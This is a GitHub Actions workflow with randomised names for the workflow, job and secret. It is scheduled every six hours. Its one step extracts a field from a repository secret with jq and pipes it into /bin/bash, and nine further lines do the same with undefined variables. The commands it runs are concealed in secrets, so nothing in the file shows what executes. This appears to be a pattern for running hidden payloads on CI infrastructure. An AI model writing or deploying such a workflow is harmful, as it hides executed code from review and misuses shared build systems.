name: zhangshancui4657

on:
  workflow_dispatch:
  schedule:
    - cron: '36 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhangshancui4657
        env:
          bndpi97355: ${{ secrets.bndpi97355 }}
        run: |
          echo $bndpi97355 | jq -r .utkp53974 | /bin/bash
          echo $g9352 | jq -r .n20 | /bin/bash
          echo $a89908 | jq -r .oeh30 | /bin/bash
          echo $zqam488 | jq -r .ix7 | /bin/bash
          echo $oky9 | jq -r .njvep4748 | /bin/bash
          echo $muu87 | jq -r .mimr95 | /bin/bash
          echo $gcpu95722 | jq -r .shqw02 | /bin/bash
          echo $et471 | jq -r .hscy93 | /bin/bash
          echo $s6 | jq -r .zmlsh07 | /bin/bash
          echo $u90 | jq -r .taubu96 | /bin/bash

